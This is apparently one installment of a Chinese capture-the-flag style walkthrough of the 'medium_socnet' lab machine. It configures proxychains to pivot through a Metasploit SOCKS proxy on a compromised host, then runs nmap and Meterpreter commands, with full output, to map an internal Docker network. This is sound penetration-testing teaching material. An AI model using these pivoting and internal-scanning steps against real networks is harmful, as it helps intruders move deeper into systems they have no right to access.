经验总结

  1. 首页 > 生活 > >

靶机: medium_socnet( 五 )

生活百科

  • 下一步,配置本地 proxychains 代理链工具【先确定是否安装,推荐使用新的 proxychains4】,上面的 shell 不用关闭,再开一个 kali 的 shell 并且在新的命令行使用命令,配置 proxychains 的代理列表添加 socks4 [上面 set SRVHOST 的 IP 地址] [上面的 SRVPORT]
    touch proxychains.conf# 创建目录级的 proxychains 配置文件,我们不污染系统级的配置文件sudo cat /etc/proxychains4.conf > ./proxychains.conf# 将系统级的配置文件复刻到当前目录的配置文件 proxychains.confvim ./proxychains.conf# 只需要修改最后一行 socks4 127.0.0.1 9050 改为 socks4 192.168.56.103 1080
  • 完成整个代理步骤后可以通过 proxychainsproxychains4 作为其他命令前缀探索内网,但我们使用的是目录级 proxychains 配置文件实验需要使用 -f 参数指定配置文件
    proxychains4 -f ./proxychains.conf nmap -Pn -sT 172.17.0.0/24# 172.17.0.0/24 是目标容器系统的内网网段,扫描过程中可能会比较费时【段扫描数量太大】我们使用之前 msf 的那个 shell 执行 sessions -1 回到之前的挂起的会话,使用 arp a 简单说明判断其他存活的 ip
    meterpreter > arp -aARP cache=========IP addressMAC addressInterface------------------------------172.17.0.102:42:e9:66:7d:b6用 proxychains 的那个 shell 执行 nmap 扫描 172.17.0.1
    ┌──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf nmap 172.17.0.1[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-19 19:15 CST[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:80 <--denied[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:25 <--denied[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:993 <--denied......[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:555 <--denied[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:2047 <--deniedNmap scan report for 172.17.0.1Host is up (0.0074s latency).Not shown: 998 closed tcp ports (conn-refused)PORTSTATE SERVICE22/tcpopenssh5000/tcp openupnpNmap done: 1 IP address (1 host up) scanned in 11.28 seconds
    • 开始正餐行好,我们已经可以在目标容器内网使用 kali 了,下面我们真正的目标发起攻击
    ┌──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf nmap -p22,5000 -Pn -sT -sV 172.17.0.1255 ?[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-19 20:24 CST[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:22...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:22...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.1:5000...OKNmap scan report for 172.17.0.1Host is up (0.033s latency).PORTSTATE SERVICE VERSION22/tcpopensshOpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)5000/tcp openhttpWerkzeug httpd 0.14.1 (Python 2.7.15)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds

    经验总结扩展阅读


    上一篇:2023年2月7日是投资的黄道吉日吗 2023年2月7日投资行吗

    下一篇:2024年九月初七出生张姓男孩名字叫什么好名字推荐